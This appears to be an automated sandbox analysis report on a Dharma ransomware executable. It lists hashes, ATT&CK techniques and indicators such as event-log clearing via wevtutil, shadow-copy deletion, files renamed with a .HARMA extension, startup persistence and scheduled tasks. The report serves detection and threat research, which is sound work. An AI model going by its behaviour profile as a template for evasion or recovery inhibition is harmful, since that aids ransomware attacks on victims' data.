dharma | 72ea5a2972634a78b4808d2164517dc8dbed4eef24d05d135dbe537e05208bf2

Analysis

max time kernel
58s
max time network
147s
platform
windows10-2004_x64
resource
win10v2004-20231215-en
resource tags

arch:x64arch:x86image:win10v2004-20231215-enlocale:en-usos:windows10-2004-x64system
submitted
22-12-2023 00:08

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

30e1234ef3e570667526fdb006832b12.exe
Size

913KB
MD5

30e1234ef3e570667526fdb006832b12
SHA1

01de8ba945945b58824f69553ac0f7b048645d45
SHA256

72ea5a2972634a78b4808d2164517dc8dbed4eef24d05d135dbe537e05208bf2
SHA512

00bd673f43cba1b16363433e672b30d22196fa0b67c024f970da15270323e545d15b3b990ed1dbbc3e7b9421c3f7840b10621c76203f89e0bcb1214e2a129e4e
SSDEEP

24576:Utp7PNBIIr2i1VzBPZYpoEjH2NzQufi9Re+SfM+:uPSiJP+BH2NQufire+SfM+

Score

10^/10

dharma discovery evasion ransomware

Malware Config

Signatures

Dharma
Dharma is a ransomware that uses security software installation to hide malicious activities.
ransomware dharma

Clears Windows event logs 1 TTPs 64 IoCs

evasion ransomware

Indicator Removal

T1070

pid	Process
2804	wevtutil.exe
1668	wevtutil.exe
3724	wevtutil.exe
1088	wevtutil.exe
4820	wevtutil.exe
1396	wevtutil.exe
4220	wevtutil.exe
432	wevtutil.exe
1792	wevtutil.exe
4516	wevtutil.exe
1308	Process not Found
1484	wevtutil.exe
1444	Process not Found
4240	Process not Found
4240	wevtutil.exe
1728	Process not Found
2212	wevtutil.exe
3904	wevtutil.exe
2432	wevtutil.exe
972	wevtutil.exe
1884	wevtutil.exe
3280	wevtutil.exe
4268	wevtutil.exe
2904	wevtutil.exe
952	wevtutil.exe
3232	wevtutil.exe
1332	wevtutil.exe
3996	wevtutil.exe
3280	Process not Found
3996	wevtutil.exe
5004	Process not Found
4360	Process not Found
1112	wevtutil.exe
692	wevtutil.exe
3376	wevtutil.exe
2696	wevtutil.exe
4052	wevtutil.exe
4600	wevtutil.exe
2012	wevtutil.exe
2840	wevtutil.exe
1704	wevtutil.exe
1604	wevtutil.exe
5116	wevtutil.exe
888	wevtutil.exe
4892	wevtutil.exe
4544	wevtutil.exe
372	wevtutil.exe
4804	wevtutil.exe
4272	wevtutil.exe
2844	wevtutil.exe
4880	Process not Found
840	wevtutil.exe
2904	wevtutil.exe
2432	wevtutil.exe
928	wevtutil.exe
4668	Process not Found
4396	wevtutil.exe
3680	wevtutil.exe
1324	wevtutil.exe
812	Process not Found
3772	wevtutil.exe
1684	wevtutil.exe
928	wevtutil.exe
5020	wevtutil.exe

Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware

File Deletion
T1070.004

Inhibit System Recovery
T1490
Renames multiple (7903) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
ransomware
Disables Task Manager via registry modification
evasion
Disables taskbar notifications via registry modification
evasion
Disables use of System Restore points 1 TTPs
evasion

Inhibit System Recovery
T1490

Drops startup file 3 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\harma.exe	cmd.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\harma.exe	cmd.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\harma.exe	attrib.exe

Modifies file permissions 1 TTPs 1 IoCs

discovery

File and Directory Permissions Modification

T1222

pid	Process
1596	icacls.exe

Enumerates connected drives 3 TTPs 24 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
File opened (read-only)	\??\Q:	30e1234ef3e570667526fdb006832b12.exe
File opened (read-only)	\??\S:	30e1234ef3e570667526fdb006832b12.exe
File opened (read-only)	\??\T:	30e1234ef3e570667526fdb006832b12.exe
File opened (read-only)	\??\W:	30e1234ef3e570667526fdb006832b12.exe
File opened (read-only)	\??\L:	30e1234ef3e570667526fdb006832b12.exe
File opened (read-only)	\??\M:	30e1234ef3e570667526fdb006832b12.exe
File opened (read-only)	\??\B:	30e1234ef3e570667526fdb006832b12.exe
File opened (read-only)	\??\Z:	30e1234ef3e570667526fdb006832b12.exe
File opened (read-only)	\??\F:	30e1234ef3e570667526fdb006832b12.exe
File opened (read-only)	\??\A:	30e1234ef3e570667526fdb006832b12.exe
File opened (read-only)	\??\Y:	30e1234ef3e570667526fdb006832b12.exe
File opened (read-only)	\??\N:	30e1234ef3e570667526fdb006832b12.exe
File opened (read-only)	\??\U:	30e1234ef3e570667526fdb006832b12.exe
File opened (read-only)	\??\X:	30e1234ef3e570667526fdb006832b12.exe
File opened (read-only)	\??\E:	30e1234ef3e570667526fdb006832b12.exe
File opened (read-only)	\??\G:	30e1234ef3e570667526fdb006832b12.exe
File opened (read-only)	\??\K:	30e1234ef3e570667526fdb006832b12.exe
File opened (read-only)	\??\O:	30e1234ef3e570667526fdb006832b12.exe
File opened (read-only)	\??\P:	30e1234ef3e570667526fdb006832b12.exe
File opened (read-only)	\??\R:	30e1234ef3e570667526fdb006832b12.exe
File opened (read-only)	\??\V:	30e1234ef3e570667526fdb006832b12.exe
File opened (read-only)	\??\H:	30e1234ef3e570667526fdb006832b12.exe
File opened (read-only)	\??\I:	30e1234ef3e570667526fdb006832b12.exe
File opened (read-only)	\??\J:	30e1234ef3e570667526fdb006832b12.exe

Drops file in Program Files directory 64 IoCs

description	ioc	Process
File opened for modification	C:\Program Files\7-Zip\Lang\ku.txt.id-F3AA16D8.[[email protected]].HARMA	30e1234ef3e570667526fdb006832b12.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\jre\lib\deploy\[email protected].[[email protected]].HARMA	30e1234ef3e570667526fdb006832b12.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\jre\lib\ext\jfxrt.jar.id-F3AA16D8.[[email protected]].HARMA	30e1234ef3e570667526fdb006832b12.exe
File opened for modification	C:\Program Files\Microsoft Office\root\vfs\Common AppData\Microsoft Help\MS.SETLANG.16.1033.hxn.id-F3AA16D8.[[email protected]].HARMA	30e1234ef3e570667526fdb006832b12.exe
File opened for modification	C:\Program Files\Microsoft Office\root\vfs\ProgramFilesX64\Microsoft Analysis Services\AS OLEDB\140\Cartridges\trdtv2r41.xsl.id-F3AA16D8.[[email protected]].HARMA	30e1234ef3e570667526fdb006832b12.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\images\rhp_world_icon_2x.png.id-F3AA16D8.[[email protected]].HARMA	30e1234ef3e570667526fdb006832b12.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\StandardVL_MAK-ppd.xrm-ms.id-F3AA16D8.[[email protected]].HARMA	30e1234ef3e570667526fdb006832b12.exe
File opened for modification	C:\Program Files\Microsoft Office\PackageManifests\AppXManifest.90160000-0115-0409-1000-0000000FF1CE.xml.id-F3AA16D8.[[email protected]].HARMA	30e1234ef3e570667526fdb006832b12.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\AccessVL_KMS_Client-ul.xrm-ms.id-F3AA16D8.[[email protected]].HARMA	30e1234ef3e570667526fdb006832b12.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\VisioProXC2RVL_KMS_ClientC2R-ppd.xrm-ms.id-F3AA16D8.[[email protected]].HARMA	30e1234ef3e570667526fdb006832b12.exe
File opened for modification	C:\Program Files\Microsoft Office\root\vfs\Fonts\private\REFSPCL.TTF.id-F3AA16D8.[[email protected]].HARMA	30e1234ef3e570667526fdb006832b12.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\lua\playlist\cue.luac.id-F3AA16D8.[[email protected]].HARMA	30e1234ef3e570667526fdb006832b12.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\images\logo_retina.png.id-F3AA16D8.[[email protected]].HARMA	30e1234ef3e570667526fdb006832b12.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\FPA_f4\FA000000005.id-F3AA16D8.[[email protected]].HARMA	30e1234ef3e570667526fdb006832b12.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\LogoImages\ExcelLogo.contrast-white_scale-100.png.id-F3AA16D8.[[email protected]].HARMA	30e1234ef3e570667526fdb006832b12.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\locale\pt_PT\LC_MESSAGES\vlc.mo.id-F3AA16D8.[[email protected]].HARMA	30e1234ef3e570667526fdb006832b12.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\pdf-ownership-rdr-es_es.gif.id-F3AA16D8.[[email protected]].HARMA	30e1234ef3e570667526fdb006832b12.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\s_unshare_18.svg.id-F3AA16D8.[[email protected]].HARMA	30e1234ef3e570667526fdb006832b12.exe
File opened for modification	C:\Program Files\CompressCheckpoint.mpeg2.id-F3AA16D8.[[email protected]].HARMA	30e1234ef3e570667526fdb006832b12.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\da-dk\ui-strings.js.id-F3AA16D8.[[email protected]].HARMA	30e1234ef3e570667526fdb006832b12.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\MondoR_EnterpriseSub_Bypass30-ppd.xrm-ms.id-F3AA16D8.[[email protected]].HARMA	30e1234ef3e570667526fdb006832b12.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\css\main-cef.css.id-F3AA16D8.[[email protected]].HARMA	30e1234ef3e570667526fdb006832b12.exe
File opened for modification	C:\Program Files\7-Zip\Lang\pt-br.txt.id-F3AA16D8.[[email protected]].HARMA	30e1234ef3e570667526fdb006832b12.exe
File opened for modification	C:\Program Files\7-Zip\Lang\lv.txt.id-F3AA16D8.[[email protected]].HARMA	30e1234ef3e570667526fdb006832b12.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\LogoImages\PowerPntLogoSmall.contrast-black_scale-100.png.id-F3AA16D8.[[email protected]].HARMA	30e1234ef3e570667526fdb006832b12.exe
File opened for modification	C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\BLUECALM\BLUECALM.ELM.id-F3AA16D8.[[email protected]].HARMA	30e1234ef3e570667526fdb006832b12.exe
File opened for modification	C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Locales\es-419.pak.id-F3AA16D8.[[email protected]].HARMA	30e1234ef3e570667526fdb006832b12.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\MEDIA\VOLTAGE.WAV.id-F3AA16D8.[[email protected]].HARMA	30e1234ef3e570667526fdb006832b12.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\hr-hr\ui-strings.js.id-F3AA16D8.[[email protected]].HARMA	30e1234ef3e570667526fdb006832b12.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\Access2019R_Trial-pl.xrm-ms.id-F3AA16D8.[[email protected]].HARMA	30e1234ef3e570667526fdb006832b12.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\FPA_FA000000009\FA000000009.id-F3AA16D8.[[email protected]].HARMA	30e1234ef3e570667526fdb006832b12.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\HomeBusiness2019R_OEM_Perp4-ul-phn.xrm-ms.id-F3AA16D8.[[email protected]].HARMA	30e1234ef3e570667526fdb006832b12.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\ProjectStdO365R_SubTrial-ul-oob.xrm-ms.id-F3AA16D8.[[email protected]].HARMA	30e1234ef3e570667526fdb006832b12.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\StandardVL_MAK-ul-phn.xrm-ms.id-F3AA16D8.[[email protected]].HARMA	30e1234ef3e570667526fdb006832b12.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\AugLoop\bundle.js.id-F3AA16D8.[[email protected]].HARMA	30e1234ef3e570667526fdb006832b12.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroApp\ENU\Review_RHP.aapp.id-F3AA16D8.[[email protected]].HARMA	30e1234ef3e570667526fdb006832b12.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\comment.svg.id-F3AA16D8.[[email protected]].HARMA	30e1234ef3e570667526fdb006832b12.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\S_IlluNoInternetConnection_120x80.svg.id-F3AA16D8.[[email protected]].HARMA	30e1234ef3e570667526fdb006832b12.exe
File opened for modification	C:\Program Files\WindowsPowerShell\Modules\PackageManagement\1.0.0.1\DSCResources\MSFT_PackageManagementSource\de-DE\MSFT_PackageManagementSource.schema.mfl.id-F3AA16D8.[[email protected]].HARMA	30e1234ef3e570667526fdb006832b12.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\sk-sk\ui-strings.js.id-F3AA16D8.[[email protected]].HARMA	30e1234ef3e570667526fdb006832b12.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\Excel2019R_OEM_Perp-ul-phn.xrm-ms.id-F3AA16D8.[[email protected]].HARMA	30e1234ef3e570667526fdb006832b12.exe
File opened for modification	C:\Program Files\WindowsPowerShell\Modules\PackageManagement\1.0.0.1\DSCResources\MSFT_PackageManagement\it-IT\MSFT_PackageManagement.schema.mfl.id-F3AA16D8.[[email protected]].HARMA	30e1234ef3e570667526fdb006832b12.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\fr-ma\ui-strings.js.id-F3AA16D8.[[email protected]].HARMA	30e1234ef3e570667526fdb006832b12.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\zh-tw\ui-strings.js.id-F3AA16D8.[[email protected]].HARMA	30e1234ef3e570667526fdb006832b12.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\1033\TelemetryLog.xltx.id-F3AA16D8.[[email protected]].HARMA	30e1234ef3e570667526fdb006832b12.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\include\win32\jni_md.h.id-F3AA16D8.[[email protected]].HARMA	30e1234ef3e570667526fdb006832b12.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\O365HomePremR_Subscription3-pl.xrm-ms.id-F3AA16D8.[[email protected]].HARMA	30e1234ef3e570667526fdb006832b12.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000027\assets\Icons\NewCommentRTL.png.id-F3AA16D8.[[email protected]].HARMA	30e1234ef3e570667526fdb006832b12.exe
File opened for modification	C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\VisualElements\Logo.png.id-F3AA16D8.[[email protected]].HARMA	30e1234ef3e570667526fdb006832b12.exe
File opened for modification	C:\Program Files\Java\jre-1.8\legal\jdk\giflib.md.id-F3AA16D8.[[email protected]].HARMA	30e1234ef3e570667526fdb006832b12.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\PublisherVL_MAK-pl.xrm-ms.id-F3AA16D8.[[email protected]].HARMA	30e1234ef3e570667526fdb006832b12.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\s_newfolder_18.svg.id-F3AA16D8.[[email protected]].HARMA	30e1234ef3e570667526fdb006832b12.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\ru-ru\ui-strings.js.id-F3AA16D8.[[email protected]].HARMA	30e1234ef3e570667526fdb006832b12.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\he-il\ui-strings.js.id-F3AA16D8.[[email protected]].HARMA	30e1234ef3e570667526fdb006832b12.exe
File opened for modification	C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_proxy\identity_helper.Sparse.Canary.msix.id-F3AA16D8.[[email protected]].HARMA	30e1234ef3e570667526fdb006832b12.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\ProjectProR_Grace-ul-oob.xrm-ms.id-F3AA16D8.[[email protected]].HARMA	30e1234ef3e570667526fdb006832b12.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\lua\http\view.html.id-F3AA16D8.[[email protected]].HARMA	30e1234ef3e570667526fdb006832b12.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\SearchEmail2x.png.id-F3AA16D8.[[email protected]].HARMA	30e1234ef3e570667526fdb006832b12.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\js\nls\en-gb\ui-strings.js.id-F3AA16D8.[[email protected]].HARMA	30e1234ef3e570667526fdb006832b12.exe
File opened for modification	C:\Program Files\WindowsPowerShell\Modules\PackageManagement\1.0.0.1\DSCResources\PackageManagementDscUtilities.psm1.id-F3AA16D8.[[email protected]].HARMA	30e1234ef3e570667526fdb006832b12.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\HomeBusinessR_Retail3-ul-oob.xrm-ms.id-F3AA16D8.[[email protected]].HARMA	30e1234ef3e570667526fdb006832b12.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\1033\ClientARMRefer_eula.txt.id-F3AA16D8.[[email protected]].HARMA	30e1234ef3e570667526fdb006832b12.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\1033\ONINTL.DLL.id-F3AA16D8.[[email protected]].HARMA	30e1234ef3e570667526fdb006832b12.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Tracker\review_browser.gif.id-F3AA16D8.[[email protected]].HARMA	30e1234ef3e570667526fdb006832b12.exe

Drops file in Windows directory 1 IoCs

description	ioc	Process
File created	C:\Windows\HRMPRIV	30e1234ef3e570667526fdb006832b12.exe

Launches sc.exe 4 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
816	sc.exe
4544	sc.exe
4336	sc.exe
320	sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Creates scheduled task(s) 1 TTPs 5 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task/Job

T1053

pid	Process
4336	schtasks.exe
4564	schtasks.exe
4220	schtasks.exe
3296	schtasks.exe
4268	schtasks.exe

Kills process with taskkill 5 IoCs

evasion

pid	Process
1900	taskkill.exe
1772	taskkill.exe
3028	taskkill.exe
4832	taskkill.exe
2336	taskkill.exe

Runs net.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
2068	30e1234ef3e570667526fdb006832b12.exe
2068	30e1234ef3e570667526fdb006832b12.exe
2068	30e1234ef3e570667526fdb006832b12.exe
2068	30e1234ef3e570667526fdb006832b12.exe
2068	30e1234ef3e570667526fdb006832b12.exe
2068	30e1234ef3e570667526fdb006832b12.exe
2068	30e1234ef3e570667526fdb006832b12.exe
2068	30e1234ef3e570667526fdb006832b12.exe
2068	30e1234ef3e570667526fdb006832b12.exe
2068	30e1234ef3e570667526fdb006832b12.exe
2068	30e1234ef3e570667526fdb006832b12.exe
2068	30e1234ef3e570667526fdb006832b12.exe
2068	30e1234ef3e570667526fdb006832b12.exe
2068	30e1234ef3e570667526fdb006832b12.exe
2068	30e1234ef3e570667526fdb006832b12.exe
2068	30e1234ef3e570667526fdb006832b12.exe
2068	30e1234ef3e570667526fdb006832b12.exe
2068	30e1234ef3e570667526fdb006832b12.exe
2068	30e1234ef3e570667526fdb006832b12.exe
2068	30e1234ef3e570667526fdb006832b12.exe
2068	30e1234ef3e570667526fdb006832b12.exe
2068	30e1234ef3e570667526fdb006832b12.exe
2068	30e1234ef3e570667526fdb006832b12.exe
2068	30e1234ef3e570667526fdb006832b12.exe
2068	30e1234ef3e570667526fdb006832b12.exe
2068	30e1234ef3e570667526fdb006832b12.exe
2068	30e1234ef3e570667526fdb006832b12.exe
2068	30e1234ef3e570667526fdb006832b12.exe
2068	30e1234ef3e570667526fdb006832b12.exe
2068	30e1234ef3e570667526fdb006832b12.exe
2068	30e1234ef3e570667526fdb006832b12.exe
2068	30e1234ef3e570667526fdb006832b12.exe
2068	30e1234ef3e570667526fdb006832b12.exe
2068	30e1234ef3e570667526fdb006832b12.exe
2068	30e1234ef3e570667526fdb006832b12.exe
2068	30e1234ef3e570667526fdb006832b12.exe
2068	30e1234ef3e570667526fdb006832b12.exe
2068	30e1234ef3e570667526fdb006832b12.exe
2068	30e1234ef3e570667526fdb006832b12.exe
2068	30e1234ef3e570667526fdb006832b12.exe
2068	30e1234ef3e570667526fdb006832b12.exe
2068	30e1234ef3e570667526fdb006832b12.exe
2068	30e1234ef3e570667526fdb006832b12.exe
2068	30e1234ef3e570667526fdb006832b12.exe
2068	30e1234ef3e570667526fdb006832b12.exe
2068	30e1234ef3e570667526fdb006832b12.exe
2068	30e1234ef3e570667526fdb006832b12.exe
2068	30e1234ef3e570667526fdb006832b12.exe
2068	30e1234ef3e570667526fdb006832b12.exe
2068	30e1234ef3e570667526fdb006832b12.exe
2068	30e1234ef3e570667526fdb006832b12.exe
2068	30e1234ef3e570667526fdb006832b12.exe
2068	30e1234ef3e570667526fdb006832b12.exe
2068	30e1234ef3e570667526fdb006832b12.exe
2068	30e1234ef3e570667526fdb006832b12.exe
2068	30e1234ef3e570667526fdb006832b12.exe
2068	30e1234ef3e570667526fdb006832b12.exe
2068	30e1234ef3e570667526fdb006832b12.exe
2068	30e1234ef3e570667526fdb006832b12.exe
2068	30e1234ef3e570667526fdb006832b12.exe
2068	30e1234ef3e570667526fdb006832b12.exe
2068	30e1234ef3e570667526fdb006832b12.exe
2068	30e1234ef3e570667526fdb006832b12.exe
2068	30e1234ef3e570667526fdb006832b12.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	3028	taskkill.exe
Token: SeDebugPrivilege	4832	taskkill.exe
Token: SeIncreaseQuotaPrivilege	624	Process not Found
Token: SeSecurityPrivilege	624	Process not Found
Token: SeTakeOwnershipPrivilege	624	Process not Found
Token: SeLoadDriverPrivilege	624	Process not Found
Token: SeSystemProfilePrivilege	624	Process not Found
Token: SeSystemtimePrivilege	624	Process not Found
Token: SeProfSingleProcessPrivilege	624	Process not Found
Token: SeIncBasePriorityPrivilege	624	Process not Found
Token: SeCreatePagefilePrivilege	624	Process not Found
Token: SeBackupPrivilege	624	Process not Found
Token: SeRestorePrivilege	624	Process not Found
Token: SeShutdownPrivilege	624	Process not Found
Token: SeDebugPrivilege	624	Process not Found
Token: SeSystemEnvironmentPrivilege	624	Process not Found
Token: SeRemoteShutdownPrivilege	624	Process not Found
Token: SeUndockPrivilege	624	Process not Found
Token: SeManageVolumePrivilege	624	Process not Found
Token: 33	624	Process not Found
Token: 34	624	Process not Found
Token: 35	624	Process not Found
Token: 36	624	Process not Found
Token: SeIncreaseQuotaPrivilege	624	Process not Found
Token: SeSecurityPrivilege	624	Process not Found
Token: SeTakeOwnershipPrivilege	624	Process not Found
Token: SeLoadDriverPrivilege	624	Process not Found
Token: SeSystemProfilePrivilege	624	Process not Found
Token: SeSystemtimePrivilege	624	Process not Found
Token: SeProfSingleProcessPrivilege	624	Process not Found
Token: SeIncBasePriorityPrivilege	624	Process not Found
Token: SeCreatePagefilePrivilege	624	Process not Found
Token: SeBackupPrivilege	624	Process not Found
Token: SeRestorePrivilege	624	Process not Found
Token: SeShutdownPrivilege	624	Process not Found
Token: SeDebugPrivilege	624	Process not Found
Token: SeSystemEnvironmentPrivilege	624	Process not Found
Token: SeRemoteShutdownPrivilege	624	Process not Found
Token: SeUndockPrivilege	624	Process not Found
Token: SeManageVolumePrivilege	624	Process not Found
Token: 33	624	Process not Found
Token: 34	624	Process not Found
Token: 35	624	Process not Found
Token: 36	624	Process not Found
Token: SeBackupPrivilege	4460	vssvc.exe
Token: SeRestorePrivilege	4460	vssvc.exe
Token: SeAuditPrivilege	4460	vssvc.exe
Token: SeDebugPrivilege	2336	Process not Found
Token: SeDebugPrivilege	1900	Process not Found
Token: SeDebugPrivilege	1772	wevtutil.exe
Token: SeSecurityPrivilege	4084	wevtutil.exe
Token: SeBackupPrivilege	4084	wevtutil.exe
Token: SeSecurityPrivilege	928	wevtutil.exe
Token: SeBackupPrivilege	928	wevtutil.exe
Token: SeSecurityPrivilege	4556	Process not Found
Token: SeBackupPrivilege	4556	Process not Found
Token: SeSecurityPrivilege	3184	attrib.exe
Token: SeBackupPrivilege	3184	attrib.exe
Token: SeSecurityPrivilege	4392	reg.exe
Token: SeBackupPrivilege	4392	reg.exe
Token: SeSecurityPrivilege	2040	cmd.exe
Token: SeBackupPrivilege	2040	cmd.exe
Token: SeSecurityPrivilege	3640	wevtutil.exe
Token: SeBackupPrivilege	3640	wevtutil.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2068 wrote to memory of 3352	2068	30e1234ef3e570667526fdb006832b12.exe	91
PID 2068 wrote to memory of 3352	2068	30e1234ef3e570667526fdb006832b12.exe	91
PID 2068 wrote to memory of 3352	2068	30e1234ef3e570667526fdb006832b12.exe	91
PID 3352 wrote to memory of 3296	3352	cmd.exe	92
PID 3352 wrote to memory of 3296	3352	cmd.exe	92
PID 3352 wrote to memory of 3296	3352	cmd.exe	92
PID 2068 wrote to memory of 4548	2068	30e1234ef3e570667526fdb006832b12.exe	95
PID 2068 wrote to memory of 4548	2068	30e1234ef3e570667526fdb006832b12.exe	95
PID 2068 wrote to memory of 4548	2068	30e1234ef3e570667526fdb006832b12.exe	95
PID 2068 wrote to memory of 740	2068	30e1234ef3e570667526fdb006832b12.exe	96
PID 2068 wrote to memory of 740	2068	30e1234ef3e570667526fdb006832b12.exe	96
PID 2068 wrote to memory of 740	2068	30e1234ef3e570667526fdb006832b12.exe	96
PID 2068 wrote to memory of 2712	2068	30e1234ef3e570667526fdb006832b12.exe	97
PID 2068 wrote to memory of 2712	2068	30e1234ef3e570667526fdb006832b12.exe	97
PID 2068 wrote to memory of 2712	2068	30e1234ef3e570667526fdb006832b12.exe	97
PID 2712 wrote to memory of 4268	2712	cmd.exe	98
PID 2712 wrote to memory of 4268	2712	cmd.exe	98
PID 2712 wrote to memory of 4268	2712	cmd.exe	98
PID 2068 wrote to memory of 2544	2068	30e1234ef3e570667526fdb006832b12.exe	101
PID 2068 wrote to memory of 2544	2068	30e1234ef3e570667526fdb006832b12.exe	101
PID 2068 wrote to memory of 2544	2068	30e1234ef3e570667526fdb006832b12.exe	101
PID 2544 wrote to memory of 1956	2544	cmd.exe	100
PID 2544 wrote to memory of 1956	2544	cmd.exe	100
PID 2544 wrote to memory of 1956	2544	cmd.exe	100
PID 2068 wrote to memory of 2196	2068	30e1234ef3e570667526fdb006832b12.exe	103
PID 2068 wrote to memory of 2196	2068	30e1234ef3e570667526fdb006832b12.exe	103
PID 2068 wrote to memory of 2196	2068	30e1234ef3e570667526fdb006832b12.exe	103
PID 2196 wrote to memory of 4336	2196	cmd.exe	102
PID 2196 wrote to memory of 4336	2196	cmd.exe	102
PID 2196 wrote to memory of 4336	2196	cmd.exe	102
PID 2068 wrote to memory of 1608	2068	30e1234ef3e570667526fdb006832b12.exe	104
PID 2068 wrote to memory of 1608	2068	30e1234ef3e570667526fdb006832b12.exe	104
PID 2068 wrote to memory of 1608	2068	30e1234ef3e570667526fdb006832b12.exe	104
PID 1608 wrote to memory of 4564	1608	cmd.exe	105
PID 1608 wrote to memory of 4564	1608	cmd.exe	105
PID 1608 wrote to memory of 4564	1608	cmd.exe	105
PID 2068 wrote to memory of 2748	2068	30e1234ef3e570667526fdb006832b12.exe	109
PID 2068 wrote to memory of 2748	2068	30e1234ef3e570667526fdb006832b12.exe	109
PID 2068 wrote to memory of 2748	2068	30e1234ef3e570667526fdb006832b12.exe	109
PID 2748 wrote to memory of 3244	2748	cmd.exe	108
PID 2748 wrote to memory of 3244	2748	cmd.exe	108
PID 2748 wrote to memory of 3244	2748	cmd.exe	108
PID 2068 wrote to memory of 1508	2068	30e1234ef3e570667526fdb006832b12.exe	107
PID 2068 wrote to memory of 1508	2068	30e1234ef3e570667526fdb006832b12.exe	107
PID 2068 wrote to memory of 1508	2068	30e1234ef3e570667526fdb006832b12.exe	107
PID 1508 wrote to memory of 3592	1508	cmd.exe	106
PID 1508 wrote to memory of 3592	1508	cmd.exe	106
PID 1508 wrote to memory of 3592	1508	cmd.exe	106
PID 2068 wrote to memory of 4720	2068	30e1234ef3e570667526fdb006832b12.exe	110
PID 2068 wrote to memory of 4720	2068	30e1234ef3e570667526fdb006832b12.exe	110
PID 2068 wrote to memory of 4720	2068	30e1234ef3e570667526fdb006832b12.exe	110
PID 4720 wrote to memory of 4716	4720	cmd.exe	112
PID 4720 wrote to memory of 4716	4720	cmd.exe	112
